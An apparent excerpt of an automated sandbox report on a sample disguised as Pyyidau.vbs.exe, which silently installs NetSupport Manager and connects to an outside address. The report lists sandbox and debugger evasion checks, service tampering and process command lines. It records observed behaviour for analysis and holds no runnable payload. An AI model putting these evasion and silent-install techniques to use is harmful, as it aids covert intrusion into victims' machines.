                                Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeThread sleep count: Count: 3206 delay: -40
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeThread sleep count: Count: 6040 delay: -40
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeThread sleep count: Count: 1045 delay: -40
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,25_2_005D80C0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,25_2_005D4AF0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005C0C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,25_2_005C0C40
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D55D0 FindFirstFileW,FindClose,25_2_005D55D0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005BFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,25_2_005BFD80
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,25_2_005DBE60
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005BFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,25_2_005BFE18
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009180C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,27_2_009180C0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00914AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,27_2_00914AF0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00900C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,27_2_00900C40
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009155D0 FindFirstFileW,FindClose,27_2_009155D0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008FFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,27_2_008FFD80
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008FFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,27_2_008FFE18
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,27_2_0091BE60
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FD0C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,29_2_00FD0C40
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,29_2_00FE80C0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,29_2_00FE4AF0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE55D0 FindFirstFileW,FindClose,29_2_00FE55D0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FCFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,29_2_00FCFD80
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FEBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,29_2_00FEBE60
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FCFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,29_2_00FCFE18
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005CA860 GetVersionExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetSystemInfo,GetModuleHandleW,GetProcAddress,GetSystemMetrics,wsprintfW,25_2_005CA860
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming
                                Source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: VMware
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 000000000002004C4F4F50%02X%02X%02X%02X%02X%02XVirtualVMwareVIRTNETGetAdapt8BC
                                Source: client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: DoApplicationList type %d, found %d windows, max size %dWSAIoctlws2_32.dllGetAdaptersAddressesHyper-VVMWarevirt0000000000%02X%02X%02X%02X%02X%02XBluetoothpfn..\CTL32\tcctlex.cppRtlIpv6AddressToStringWntohl..\CTL32\tcputil.cpntohlpGetHostByNamegethostbynamepGetHostNamegethostnamepWSACleanuppWSAStartupWSOCK32.DLLSendARPSnmpExtensionQuerySnmpExtensionInitINETMIB1.DLLSnmpUtilVarBindFreeSnmpUtilOidNCmpSnmpUtilOidCpysnmpapi.dlll
                                Source: client32.exe, 00000021.00000002.115176701992.0000000000CE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                                Source: client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: vmware
                                Source: client32.exe, 00000020.00000002.115177447611.0000000000989000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                                Source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: >localhost:%d%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesHyper-VvirtualVMWarevirt0000000000%02X%02X%02X%02X%02X%02XBluetoothpfntcctlex.cppRtlIpv6AddressToStringWntdll.dllntohlTCREMOTETCBRIDGE%s=%s
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: DoApplicationList type %d, found %d windows, max size %dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLGetAdaptersAddressesvirtualVMWarevirtpfntcctlex.cppRtlIpv6AddressToStringWntohlresultpGetAdaptersInfotcputil.cpntohlpGetHostByNamegethostbynamepGetHostNamegethostnamepWSACleanuppWSAStartupWSOCK32.DLLSnmpExtensionQuerySnmpExtensionInitINETMIB1.DLLSnmpUtilVarBindFreeSnmpUtilOidNCmpSnmpUtilOidCpysnmpapi.dll
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                                Source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesHyper-VvirtualVMWarevirtBluetoothtcctlex.cppntohlserialVariantUtil.cppvariantIsScalar(_vtData)_Lower==0_nDim==1variant.vt & VT_ARRAYvariant.vt==VT_BSTR || variant.vt==(VT_BSTR | VT_BYREF)variant.vt==VT_EMPTY(serial.m_vtType & VT_ARRAY)!=0serial.m_vtType==VT_BSTRserial.m_vtType==VT_EMPTYserial.m_nBytes==SizeOf(variant.vt)serial.m_vtType==variant.vt_nBy==SizeOf(serial)falsettrue1WinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllError. WinHttpWebSocketReceive(%d) ret %d
                                Source: client32.exe, 00000020.00000003.115045937501.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069209517.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102675538.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114561669687.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114265892203.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102203122.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115115215822.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069439316.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115114283610.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115080634297.0000000000A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: client32.exe, 00000020.00000003.115045937501.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069209517.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102675538.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114561669687.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114265892203.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102203122.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115115215822.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069439316.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115114283610.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115080634297.0000000000A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
                                Source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: VMWare
                                Source: client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: vmwareVIRT%d adapters in chain, %d adapters by size
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 000000000002004C4F4F50%02X%02X%02X%02X%02X%02XVirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH..\ctl32\macaddr.cpp%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll%02X%02X%02X%02X%02X%02Xmap/set<T> too longinvalid map/set<T> iterator,%02X
                                Source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: hbuf->datahttputil.chbuf->data || newlen == 0pNewhbuf->buflen >= hbuf->datalen%d000000000002004C4F4F50%02X%02X%02X%02X%02X%02XVirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll%02X%02X%02X%02X%02X%02X%02X01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!
                                Source: pcicfgui_client.exe, 00000022.00000002.114281913286.00000000011AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesHyper-VvirtualVMWarevirtBluetoothpfn..\ctl32\tcctlex.cppRtlIpv6AddressToStringWntdll.dllntohl%s%dNSNNSPChassisTypesSystemEnclosureWin32_SystemEnclosure
                                Source: C:\Windows\Installer\MSIF373.tmpAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\Installer\MSIF985.tmpAPI call chain: ExitProcess graph end node
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\Installer\MSI1387.tmpAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information queried: ProcessInformation

                                Anti Debugging

                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeThread information set: HideFromDebugger
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeOpen window title or class name: procmon_window_class
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess queried: DebugPort
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005E82B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_005E82B3
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005B0130 GetLastError,GetTickCount,GetMessageW,TranslateMessage,DispatchMessageW,GetTickCount,GetMessageW,TranslateMessage,DispatchMessageW,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,wsprintfW,wsprintfW,wsprintfW,GetCurrentProcess,GetProcessTimes,GetSystemTimeAsFileTime,wsprintfW,GetCurrentThreadId,wsprintfW,GetCurrentProcess,GetGuiResources,wsprintfW,GetCurrentThreadId,wsprintfW,OutputDebugStringW,wsprintfW,wsprintfW,GetModuleFileNameW,wsprintfW,GetTempPathW,GetLocalTime,GetVersionExW,wsprintfW,wsprintfW,wsprintfW,SetTimer,MessageBoxW,KillTimer,PeekMessageW,MessageBoxW,25_2_005B0130
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D5490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,25_2_005D5490
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0060C0DC GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,25_2_0060C0DC
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Debug
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005FA1DA SetUnhandledExceptionFilter,25_2_005FA1DA
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005ED4EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_005ED4EC
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0093A1DA SetUnhandledExceptionFilter,27_2_0093A1DA
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009282B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_009282B3
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0092D4EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0092D4EC
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,27_2_0091DDD0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007934C3 SetUnhandledExceptionFilter,28_2_007934C3
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_0078361B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0078361B
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_00787798 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00787798
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FEDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,GetCurrentDirectoryW,PostMessageW,KiUserCallbackDispatcher,Sleep,29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0100A1DA SetUnhandledExceptionFilter,29_2_0100A1DA
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FF82B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00FF82B3
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FFD4EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00FFD4EC
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 176.126.113.166 443
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005E03E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,25_2_005E03E0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009203E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,27_2_009203E0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FF03E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,29_2_00FF03E0
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc [encoded command omitted]
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF985.tmp "C:\Windows\Installer\MSIF985.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI1387.tmp "C:\Windows\Installer\MSI1387.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI23E6.tmp "C:\Windows\Installer\MSI23E6.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "c:\users\user\desktop\pyyidau.vbs.exe" -enc [encoded command omitted]
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI1387.tmp "c:\windows\installer\msi1387.tmp" /g"c:\program files (x86)\netsupport\netsupport manager\" /ev"netsupport school" /ef".\log files" /ef".\bookmarks" /ef".\tests" /ef".\store" /ef".\inv" /ef".\resources" /ef".\help" /ef".\image" /ef".\sound" /ef".\video" /ea /ex /ec /q /v /q /i *
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005CA250 GetModuleFileNameW,GetCurrentProcessId,wsprintfW,CreateEventW,CreateEventW,GetLastError,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,wsprintfW,CreateEventW,GetLastError,CloseHandle,wsprintfW,CreateEventW,LocalFree,CreateEventW,CreateEventW,CreateEventW,CreateThread,SetThreadPriority,25_2_005CA250
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005CA6C0 AllocateAndInitializeSid,LoadLibraryW,GetProcAddress,FreeSid,FreeLibrary,SetLastError,25_2_005CA6C0
                                Source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: a+tca+tLogSOFTWARE\Productive Computer Insight\%swinstallwinst32Log=winst32.log%04d-%02d-%02d %02d:%02d:%02d.%03d defaultGetNativeSystemInfo missingcpu type is %d, probably not x64cpu is x64, setting wow64=TRUEiswow64process, setting wow64=TRUEPCISYS started okPCISYS created okPCISYS not created, already existsPCISYS not created, e=%dsystem32\drivers\pcisys.sysVideo InitPendingFileRenameOperationsSYSTEM\CurrentControlSet\Control\Session Manager\Client32Provider.dll\cicClient32Provider.dllRegisterClient32Provider reg=%dSoftware\Policies\NetSupport\Client\StandardScreenScrapeDllInstall(%s) inst=%d, cmd=%lsDllInstallInstallShellExt Doneerror - delete on restartCopy errorCopy %s to %sRename %s to %s - %sDelete %s - %serrorokPCIShellExt.newPCIShellExt.oldPCIShellExt.dllInstallShellExt %d, doshell=%dShell_TrayWndUnloading %s
